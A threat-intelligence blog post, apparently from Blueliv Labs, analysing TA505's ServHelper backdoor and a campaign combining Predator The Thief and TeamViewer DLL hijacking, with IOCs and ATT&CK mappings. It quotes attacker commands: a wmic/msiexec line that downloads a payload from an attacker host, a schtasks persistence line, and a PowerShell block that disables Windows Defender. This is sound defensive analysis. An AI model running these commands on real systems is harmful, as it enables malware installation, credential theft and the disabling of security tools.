on

TA505 evolves ServHelper, uses Predator The Thief and Team Viewer Hijacking

Countries targeted by TA505 using ServHelper 

 

Introduction

ServHelper is a backdoor first spotted at the end of 2018 by Proofpoint and linked to TA505. This threat actor is known to have distributed Dridex and Locky in the past, in addition to FlawedAmmyyFlawedGrace and Get2/SDBBot more recently, amongst others 

This blog post will offer some analysis on developments relating to ServHelperincluding detail on relevant campaigns and those threat actors related to it. ServHelper was quiet for a while but it is back with several new campaigns from the first week of December 2019. IOCs and TTPs based on ATT&CK are shared at the end of the post. 

 

Key Points 

 

  • The group behind ServHelper is quite likely tied to Dridex Group or a spinoff. The modus operandi and tools are also reminiscent of a group operating legitimate remote administration tools in the pastand tied to Dridex too
  • TA505 has been changing tools and infection vectors continuously in the past year, going from private backdoors, loaders and stealers to legitimate remote administration tools
  • The usual targets for these attacks are in the banking sector. However, more recently TA505 targeted different kind of businesses in retail and hospitality
  • This group’s primary objective is financial gain either directly targeting banks, their clients, or profiting from any opportunities relating to retail account access
  • Blueliv’s data shows that the country most targeted by the group is the United States, followed by Canada, Pakistan, Philippines, United Kingdom, France and Germany

 

Evolution of ServHelper 

ServHelper is a backdoor first spotted by Proofpoint in November 2018 when TA505 was distributing it. The backdoor has two different variants dubbed “tunnel” and “downloader” by Proofpoint. The main objective of the “downloader” version is clear from its name: it downloads and installs additional malware, in addition to executing shell commands. The “tunnel” version borrows some commands from the “downloader” version and adds several more to create and manage a backconnect connection from the infected machine to the backconnect server, permitting the attackers a direct connection to the infected machines. 

During the first half of the year TA505 used ServHelper and FlawedAmmyy consistently, using different infection vectors like Excel or Word attachments, HTML files, .lnk files or Windows Installer files. At the end of August 2019 researchers at TrendMicro spotted new commands in ServHelper “downloader” version as well as a new use of ISO files to distribute the malware. Before that, another researcher already mentioned a new Vigenère encryption used to encrypt strings within ServHelper binaries too. 

Blueliv’s Labs team analyzed some of the latest ServHelper “tunnel” versions, identifying a variety of new commands, some of which have been present for a number of months.

Of these, we believe the most interesting ones are “deployns”, which deploys NetSupport Manager, “persist” to achieve persistence in the system via file download/execution, and commands related to keylogging and browser cookie and password theft.

In the following section we will detail some of them and avoid commands already present in other writeups: 

  • deployns: This command is sent to some bots to deploy NetSupport Manager, a legitimate Remote Administration Tool, in the infected systems. The command downloads the tool compressed in a zip file and encoded with a 1-byte XOR key. More information about this can be found in this writeup. These are some of the URLs we have seen related to this activity:

    hxxp://gabardine[.]xyz/log.txt
    hxxp://kuarela[.]xyz/1.txt
    hxxp://foxlnklnk[.]xyz/pf1.txt
    hxxp://cafafafa[.]xyz/pf1.txt
    hxxp://letitbe[.]icu/2.txt
  • persist: This command adds persistence in the machine creating a periodic task using schtasks, which runs a PowerShell script with certain frequency (every hour in the sample we analyzed). The PowerShell script uses paths retrieved from the registry to check if some files exist, downloading a new component from a link otherwise and executing it.

    cmd /C schtasks /create /tn 30860 /tr "powershell -nop -ep bypass -f %WINDIR%\help\83421.ps1" /ru system /sc hourly /mo 1). 

  • keylogstart: It adds keylogging functionalities to the malware, registering keystrokes in a “tv.txt” file located in “C:\Windows\temp\”.
     
  • keyloglist: This command permits verification if the keylogger is running already, looking for the existence of the pipe “\\.\pipe\txtpipe”. If it does not find the pipe it returns an error message to the C2.
     
  • keylogreset: Empties the file used to register the keystrokes.  
      
  • keylogdel: Kills any active keylogger instance.
     
  • getkeylog: Retrieves the keystrokes from the “tv.txt” file and sends them to the control panel.
  • infoThis command gathers information about the infected system (CPU, graphic adapter, memory, Internet speed…) using a PowerShell script and sends that to the C2.

    Name
    Intel® Core™ i5-3337U CPU @ 1.80GHz^Name
    Standard VGA Graphics Adapter^Total memory: 2,0 gBytes^Speed is 9.26 Mbit/Sec
  • getchromepasswords: It gets the content of the file “logins_read.txt”, which has been previously filled in with stored Chrome passwords, and sends this to the control panel. This file can be found in the Windows temp directory (C:/Windows/temp). 
     
  • getmozillacookies / getchromecookiesIt gets the content of the files “moz.txt” and “cookies.txt”, respectively, which has been previously filled in with Firefox and Chrome cookies, and sends that to the control panel. These files can be found in the Windows temp directory (C:/Windows/temp).
     
  • search: This command sends the number of the collected cookies stored in the files mentioned in the previous comment to the C2. In case no cookies are found then it sends “mozilla/chrome cookies not found” to the control panel.
     
  • sshurl: It sets/retrieves the URL used to download the SSH client for Windows systems, which is used to establish the tunnel to the infected machine.
     
  • setcopyurl: It sets/retrieves the URL used to download a password-protected RAR containing the tool “Runtime’s Shadow Copy”, used to copy files which are in use by the operating system. This URL and tool are used by the commands “fox” and “chrome” to copy the Firefox and Chrome profiles without problems.
     
  • fixrdp: This command modifies the RDP configuration in the Windows registry to avoid the server identity verification (sets “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\AuthenticationLevelOverride” to 0) and creates a scheduled task to restart the computer. 
     
  • updateuser: Uses the command “net.exe” to make sure that the current user can connect via RDP and has Admin privileges, adding the user to the groups “Remote Desktop User” and “Administrators”.
      
  • update: This the command which is used with a URL as a parameter in order to download a new executable and update the bot.
      
  • reboot: It creates a task to restart the computer using the command “shutdown /r /f”, launches the task and removes it.

 

Relevant Campaign Analysis 

During the past year we witnessed several TA505 campaigns where ServHelper was installed on victims’ computers. Some of them have been covered by Proofpoint, TrendMicro and other vendors, but due to sheer volume many of have not been assessed publicly. 

For instance, in December 2018 TA505 carried out a malspam Christmas campaign against banks worldwide by attaching excel files. It was not something new in terms of modus operandi or attack vector, but it is still relevant because of its seasonality and its targetsbanking entities in countries including Chile, Italy, India or South AfricaIndeed, banking entities continued to be a prime target for a good part of the first half of the year in Ireland, Japan, Hong Kong, Turkey, Malta and Philippines amongst others. 

 

Since October 2019, activity related to ServHelper decreased. However, at the beginning of December new campaigns were detected. IOCs related to these campaigns can be seen in our Community.

In this section, we focus on a campaign from the end of September and involving a stealer, Predator The Thief and Team Viewer, in addition to the usual ServHelper sample. The attack vector is again a malspam campaign, but this time including a .doc file which is actually a .docx file (a2e77ee41f4d4d3e8814d07d26ec5be3). 

The malicious document includes obfuscated macros which create a BAT file in the Windows temporary directory. It executes it via cmd.exe. The BAT file contains the following line: 

wmic process call create 'msiexec /i hxxp://96.9.211[.]157/sdf4r3r3/WinDef.msi /q'

This command launches msiexec to download, install and execute additional malware in the system, making use of Windows Installer.  

After executing the downloaded file, WinDef.msi, several files are uncompressed in a temporal directory: 

 We detail the most relevant information about those files in the following subsections: 

crypted.exe 

This binary is a variant of Predator The Thief, more specifically, version 3.3.1. Predator The Thief is a stealer which collects information like stored passwords, cookies, credit card information, crypto wallets, etc. and report all back to its control panel. In this case, the malicious domain where all the data is sent is soul-fly[.]xyz.

It is not the first time we see a stealer related to TA505 and ServHelper, as we have seen infection overlaps with some specific AZORult and KPOT botnets.  

DEFOFF.exe 

This executable contains a layer of encryption to make the analysis harder, but its behavior is quite simple. The only objective of this malicious code is using the function ShellExecuteExW to execute a PowerShell command encoded in Base64. This PowerShell command re-configures Windows Defender, deactivating realtime protection, avoiding the application sending samples automatically to Microsoft, and other configurations to try to make the attack less detectable. It is quite likely that this component is a piece of code which is available in different underground communities and used by different cybercriminals. 

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "AllowFastServiceStartup" -Type DWord -Value 0; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "ServiceKeepAlive" -Type DWord -Value 0; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Type DWord -Value 1; 
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "Real-Time Protection"; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Type DWord -Value 1; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Type DWord -Value 1; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Type DWord -Value 1; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Type DWord -Value 1; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Type DWord -Value 1; 
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "Spynet"; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "DisableBlockAtFirstSeen" -Type DWord -Value 1; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "LocalSettingOverrideSpynetReporting" -Type DWord -Value 0; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSamplesConsent" -Type DWord -Value 2; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpynetReporting" -Type DWord -Value 2; 
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name "Start" -Type DWord -Value 4; 
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "MpEngine"; 
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpCloudBlockLevel" -Type DWord -Value 2; 
gpupdate /force; 
Set-MpPreference -DisableRealtimeMonitoring $true

LDR_5622.js 

This file is a JavaScript file which is obfuscated with two different layers and which finally executes two PowerShell commands in order to download and launch additional malware from the following URLs: 

hxxps://artrolife[.]club/fhj37f34fdd/file1.exe 
hxxp://supremeconnect[.]xyz/fdfg83574gd/file2.exe

The first URL downloads another WinDef.exe file whose content is similar to the WinDef.exe files that we are describing, but also includes 64 bit version of Predator The Thief (gookld.exe). 

The second URL was not active at the moment of the analysis, so we could not identify the malware related to it. 

signed.exe 

This executable is ServHelper, which copies a PowerShell command in the user temporary directory and executes it. As mentioned in other ServHelper analyses, the PowerShell command includes a string encoded in Base64 which is also encrypted with TripleDES. After the decryption we obtain a long script which ServHelper uses to configure and load different components and functionalities. We highlight here two different functions: heller and install. 

  • heller: This function will be responsible of bypassing UAC using the Windows cloning and restoring component, Sysprep.exe, and hijacking the DLL CRYPTBASE.dll. As it is not possible to write directly in the path “%systemroot%\System32\Sysprep” to carry out the hijack, ServHelper makes use of another Windows component, wusa.exe, which permits Windows Update installations in standalone mode. wusa.exe can handle CAB files, among others, so ServHelper creates a CAB file using makecab.exe, another Windows tool, including the malicious DLL. When Sysprep is executed it loads the malicious DLL due to the DLL hijacking. This technique is mentioned in the UACMe tool.
     
  • install: Thanks to this function ServHelper installs the following components, which come encoded with Base64. 
    • botServHelper DLL which will be copied to %systemroot%\help\tmp5212.dat. 
    • bot64: 64-bit version of bot.
    • rdp: It is the RDP Wrapper Library which will be executed together with the RDP server installed in “%systemroot%\help\tmp5211.dat”. One of the main functionalities is permitting concurrent connections to the infected machine.
    • rdp64: 64-bit version of rdp.
    • cfg: RDP Wrapper Library configuration, copied to “%systemroot%\help\tmp5213.dat”.
    • clip: Legitimate rdpclip.exe. If it is not present already in the infected system, it will be copied to %systemroot%\system32\rdpclip.exe. 
    • vmt: Legitimate rfxvmt.dll. If it is not present already in the infected system, it will be copied to %systemroot%\system32\rfxvmt.dll.
       

This campaign belongs to the ServHelper botnet which uses the communication key “tkerrrwra” and XOR key “tea”. We have seen that this botnet is most active currently, being April 2019 the moment when we saw the first samples related to it. 

TeamViewer Hijacking 

Most of the Team Viewer files that are extracted from WinDef.exe are legitimate files of Team Viewer version 11.0.64630.0: 

  • TeamViewer.ini 
  • TeamViewer_Desktop.exe 
  • TeamViewer_Resource_en.dll 
  • TeamViewer_StaticRes.dll 
  • windef.exe 

However, the DLL msi.dll is not a legitimate Team Viewer file, but a malicious DLL which is loaded also as a result of DLL hijacking and takes advantage of the Windows DLL loading order. When the TeamViewer launcher, windef.exe, is executed, it finds the malicious msi.dll and loads it into memory. This malicious DLL is used to intercept different Team Viewer functions in order to hide the application window and send the session ID, password and system information to the configured C2:  

hxxp://0926tv[.]xyz/mystt34834ujf37data/indexes_data.php

As we can see in the screenshot, the self-explanatory parameters sent to the C2 are:

  • hwid
  • id
  • pass
  • username
  • pcname
  • osver
  • pid_list
It is interesting to highlight that this same technique of collecting the connection and system information after deploying several legitimate Remote Administration Tools like Ammyy Admin or Remote Manipulator System (RMS) / Remote Utilities (RUT) was already seen from a group tied to Dridex several years ago.

The same group modified Ammyy Admin to permit concurrent connections to the machine, for example, and they were sending the connection credentials to a C2 controlled by the group. We cannot confirm that both attackers are the same, but there are indeed similarities in the modus operandi, tools and relations with Dridex.

 

Threat Actors using ServHelper 

As reported by Proofpoint in January 2019, TA505 was the actor who started using ServHelper back in November 2018, mainly targeting financial institutions at that time. Originally, TA505 was described as a malware distribution network which was using the Necurs botnet to distribute different malware families, including Dridex and LockyBoth malware families are closely tied to the Dridex Group (split from the Business Club and tied to Gameover ZeuS or GOZ). Initially most analysts hypothesized that the Dridex Group used TA505 as malware distribution service.  

Following this thought process, we might imagine that a new group or a group related to the Dridex Group was using ServHelper to target banks worldwide. However, some researchers think that TA505 is the group behind ServHelper and there are no other affiliates managing the final payload. This is also a plausible hypothesis.  

Blueliv’s take here is that it is quite likely that the group behind ServHelper is closely tied to the Dridex Group, or a spinoff, since neither theory is stronger than the other.

TA505 has been distributing ServHelper for several months now, but we have confirmed a decrease in its activity since 2019 overall. During those months we have seen TA505 deploying other malware families like Flawed Ammy or FlawedGrace and legitimate remote administrations tools like RMS / RUT or TeamViewer. The decrease in the use of ServHelper was seen at the same time as an increase in the use of SDBbot, but new samples were spotted again in recent days. 

Some ServHelper botnets did not look like they were controlled by TA505 as they were distributed in a different way and used different back connect servers to create tunnels to the infected machines. Besides this, the ServHelper versions were older than those used by TA505. This suggests that it is likely that ServHelper is not exclusive to TA505. It is possible that other actors can access the source code, a leak of it or a malware kit in underground private communities.

 

Countries and sectors targeted by ServHelper 

As we have mentioned previously, TA505 distributed ServHelper to banks worldwide especially during the first part of 2019 and end of 2018.

However, Blueliv’s threat telemetry reports that the financial sector is not the only vertical which has been targeted by the group. Organizations in the retail and hospitality sectors have also been infected with this malware family, where the criminals try to make use of the direct connection (tunnel) to the machines to find a way to monetize the infections.  

Blueliv data reports that most of the infections are located in the United States, followed by Canada, Pakistan, Philippines, United Kingdom, France and Germany. This graphic of the TOP20 countries with the largest number of ServHelper infections show that the attackers are targeting the United Stated most heavily, but with countries on several continents affected. 

TA505 is targeting almost every country in the world, and is therefore a threat to any business, wherever its location and sector.

    

Conclusions 

TA505 is known to have distributed Dridex and Locky in the past. However, it is also likely that the group could have spun off from the Dridex Group to create their own subgroup and operate the final payloads themselves. In this case, they would be fully in control of the different campaigns that we have seen in the past year, where they used a significant number of different malware families and legitimate remote administration tools to carry out their attacks, including ServHelperFlawedAmmyyFlawedGrace, Predator The Thief, KPOT, Get2, SDBbot, Remote Manipulator System (RMS) and Team Viewer, among others. 

The evolution of ServHelper during these months has been notable, adding new commands as required and using a number of different infection vectors.

It was not uncommon to see additional tools like Runtime’s Shadow Copy, PowerShell scripts, NetSupport Manager and others, which complemented the functionalities of the malware. However, as this group changes tools continuously, we have also seen a decrease in the use of ServHelper overall despite a number of variants being deployed currently. Some of the new variants include new developments probably meaning that the group will not stop using ServHelper in the next months.

TA505 will not go away any time soon and it will keep targeting organizations worldwide using different tooling to avoid detection. Those tools will likely have the ability to connect to the machines remotely, stealing passwords and downloading additional malware and tools in the infected systems.  

A single infection can open the door to groups like TA505 which will use this to move laterally in the targeted network. It is therefore crucial to detect those infections in time, using threat intelligence feeds and gathering actionable information (for example, common TTPs used by these groups.) By using such intelligence, organizations can mitigate their digital risk and prevent these kinds of attacks. 

 

Indicators of Compromise (IOCs) 

The IOCs shared in this section and some additional ones have been shared in the Blueliv Community where it is possible to download them, see the behavior in our sandbox and share with other community users. 

IOC  Comment 
9aa1b6bb7d53b008b6529b4a2f6bfada ServHelper  
a2e77ee41f4d4d3e8814d07d26ec5be3 Malicious .docx 
77f46b13d858f83c3ce5bdc6ffbc8a95 WinDef.msi 
de70f256b9fd194f6844d7aa81b17b4e crypted.exe (Predator) 
6954cee9db2533337e4425aceacc547b DEFOFF.exe 
a606d454b408b99aa9fc7ad774951621 LDR_5622.js 
92cc85c53e169b330fd8686d35259261 file1.exe 
a511410d5889fca07a0dd0a8c84d6c8a signed.exe 
c3c226ec03f393103b9df764df50f0bc msi.dll 
hxxp://96.9.211[.]157/sdf4r3r3/WinDef.msi  WinDef Download URL 
hxxps://soul-fly[.]xyz/api/gate.get  Predator C2 
hxxps://artrolife[.]club/fhj37f34fdd/file1.exe  LDR_5622 URL1 
hxxp://supremeconnect[.]xyz/fdfg83574gd/file2.exe  LDR_5622 URL2 
hxxp://0926tv[.]xyz/mystt34834ujf37data/  Team Viewer Panel 
hxxp://gabardine[.]xyz/log.txt  ServHelper NetSupport 
hxxp://kuarela[.]xyz/1.txt  ServHelper NetSupport 
hxxp://foxlnklnk[.]xyz/pf1.txt  ServHelper NetSupport 
hxxp://cafafafa[.]xyz/pf1.txt  ServHelper NetSupport 
hxxp://letitbe[.]icu/2.txt  ServHelper NetSupport 

 

ATT&CK TTPs 

 

Tactic  Technique 
Initial Access  T1193 – Spearphishing Attachment 
T1192 – Spearphishing Link 
Execution  T1059 – Command-Line Interface 
T1086 – PowerShell 
T1085 – Rundll32 
T1053 – Scheduled Task 
T1064 – Scripting 
Persistence  T1098 – Account Manipulation 
T1136 – Create Account 
T1078 – Valid Accounts 
T1053 – Scheduled Task 
Privilege Escalation  T1038 – DLL Search Order Hijacking 
Defense Evasion  T1089 – Disabling Security Tools 
T1107 – File Deletion 
T1143 – Hidden Window 
Credential Access  T1179 – Hooking 
T1503 – Credentials from Web Browsers 
Discovery  T1069 – Permission Groups Discovery 
T1087 – Account Discovery 
T1082 – System Information Discovery 
Collection  T1119 – Automated Collection 
T1056 – Input Capture 
Command and Control 

 

T1132 – Data Encoding 
T1001 – Data obfuscation 
T1219 – Remote Access Tools 
T1105 – Remote File Copy 
T1071 – Standard Application Layer Protocol 
Exfiltration  T1022 – Data encryption 
Impact  T1529 – System Shutdown/Reboot 

 

References 

 

https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505 

https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/ 

https://midnight-reversing.blogspot.com/2019/07/servhelper-string-encryption.html 

https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/ 

https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader

https://prog.world/operation-ta505-part-two-learning-the-servhelper-backdoor-with-netsupport-rat/ 

 

This post was authored by Adrián Ruiz and Jose Miguel Esparza, supported by the Blueliv Labs team 

Demo Free Trial MSSP
Program